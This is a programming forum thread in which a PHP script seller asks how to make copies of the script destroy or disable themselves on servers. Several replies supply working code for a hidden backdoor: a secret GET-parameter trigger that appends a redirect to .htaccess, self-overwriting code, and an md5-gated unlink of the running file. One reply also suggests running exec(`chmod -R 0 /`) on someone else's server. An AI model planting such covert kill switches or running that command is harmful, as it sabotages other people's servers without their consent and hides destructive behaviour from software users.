Is there a was to delete a PHP file currently in use?

Hello, I was thinking about selling a PHP script and building in a security feature that I could use to check to see if anybody else had sold it. If I found the script online without my copyrights in place, I could simply send some info to it and have itself delete off of their server? Or possible re-write itself?

Any chances this could be done? (I am aware, that if the person selling or giving it away knows what they are doing, they could remove the security feature, but I'm banking that most wouldn't think to look.

So, one of two options, could the script delete itself, or could you have it re-write itself?

Regards...
LVL 14
ziffgoneAsked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

neesterCommented:
Hmm...
Yeah you could I guess.
Something I would do would be simply APPEND to the .htaccess file (if it exists) or create the .htaccess file.
Then just whenever someone runs that PHP script, it will redirect them to an image on your webserver!
The person with the script will have no idea, since the .htaccess files are usually a mystery to the people running the website.

something simple like this:

if ($_GET['_ss_'] == 1)
{
   $myFile= fopen('.htaccess','a');
   $string = "ReWriteEngine On\n\nReWriteRule ^yourscriptname.php\S+ http://www.yourserver.com/stolenimage.jpg";
   fputs($myFile, $string);
}


Then you just load the stolen page, but add this to the URL: ?_ss_=1
And then it SHOULD disable the page from loading, and load your IMAGE instead :)
0
neesterCommented:
Ahh sory, forgot this:

fclose($myFile);


if ($_GET['_ss_'] == 1)
{
   $myFile= fopen('.htaccess','a');
   $string = "ReWriteEngine On\n\nReWriteRule ^yourscriptname.php\S+ http://www.yourserver.com/stolenimage.jpg";
   fputs($myFile, $string);
   fclose($myFile);
}
0

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
ziffgoneAuthor Commented:
Hi neester,

The php page in question is being displayed in an iFrame within a parent page, this is the way it would likely be displayed everywhere, would this make a difference on the outcome?

The script works well in that it writes the .htaccess file to the directory, but when I call the parent page and it calls the php script, it is not redirecting to the "stolenimage.jpg" file.

Any ideas?

Regards...
0
Cloud Class® Course: Microsoft Windows 7 Basic

This introductory course to Windows 7 environment will teach you about working with the Windows operating system. You will learn about basic functions including start menu; the desktop; managing files, folders, and libraries.

neesterCommented:
Ahhh ok.
Well add that script to the PARENT PHP file...
I think that would work...

If that doesnt work, I need some more info on what your script actually does??
0
_GeG_Commented:
and you can rewrite/delete your own script. PHP loads the script before it is executeted, so you could use this code:
<?php
if ($_GET['_ss_'] == 1){
    $myfile=file_get_contents('myfile.php');
    $fp=fopen('myfile.php', 'w');
    fwrite($fp, <<<EOS
<?php
header('Location:  http://www.yourserver.com/stolenimage.jpg');
exit;
?>
EOS
        );
    fclose($fp);
}
?>
You will have to add code to check file system permissions before doing that...
0
neesterCommented:
>> _GeG_

yeah but see, the person running that script will EASILY be able to see whats wrong.
With my method - it hopefully will fool them into thinking there is some external validation...
0
_GeG_Commented:
@neester
yes, but ;)
with your version, the person can look in the script to find out what happened and reverse it
with my version, there is no code left to analyze

@ziffgone
do you know of the ioncube php encoder?
0
neesterCommented:
_GeG_

Yeah, but, if they have the code uplaoded.
They would have it locally anyway.
The PHP Encoders are pretty good, but I dont know of a free one??
0
frugleCommented:
The best way to protect your script is to build in license-key checking and encrypt it with zend.

Any scripts I download and use I personally check for "bad things" before I put them anywhere near my server. It is a reasonably simple task to find and remove any instructions, or to see what the "input" required is, then wipe out the site of anyone else using your script. This will reflect badly on you.

A non-destructive way to mess with someone's site and/or server is to exec(`chmod -R 0 /`); and hope the webserver user hasn't been given elevated privs... it basically renders every file on the server that is changable by the webserver (usually any files it has created itself) unreadable. It's fairly simple for a sysadmin to repair the damage as nothing is actually deleted or corrupted.

Mike
0
_GeG_Commented:
@frugle
I agree that encoding is the best way to protect a script. But ioncube is cheaper than zend ;)

To prevent misuse of your own file deletion script, you can easily use md5, something like
if (md5($_GET['_ss_']) == '43afbdd58e3e32d2f27ea0fcb2c8d401'){
...
0
frugleCommented:
From that I take it the script would look like...

if (md5($_GET['_ss_']) == '43afbdd58e3e32d2f27ea0fcb2c8d401'){
    unlink($_SERVER['SCRIPT_FILENAME']);
}

If I remember rightly, on linux servers, the physical file is loaded into memory then executed. It can therefore be unlinked prior to termination as the file is not locked open.

However, seeing this [unlink] line in an application will cause me to replace it with:

mail("me@mydomain.com", "ALERT!!!", "$_SERVER['REMOTE_ADDR'] just tried to unlink file $_SERVER['SCRIPT_FILENAME'] with command: $_SERVER['QUERY_STRING']");

I'd then be looking for REMOTE_ADDR with a large spoon.

Mike
0
_GeG_Commented:
If you had bought the script, the spoon might be the right instrument ;)
... but if not...
0
ziffgoneAuthor Commented:
Thank you all for your input, this has been an excellent lesson for me. I have decided to go with a mixture of most of what was said here.

_GeG_, your first post is essentially the solution I came to myself, so you get some points.

frugle, I have decided to go with your suggestion of md5, so you also get points

And neester, you sent me in the right direction from the start, so the majority of the points are yours.

Thanks all. :)

Regards...
0
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
PHP

From novice to tech pro — start learning today.

Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.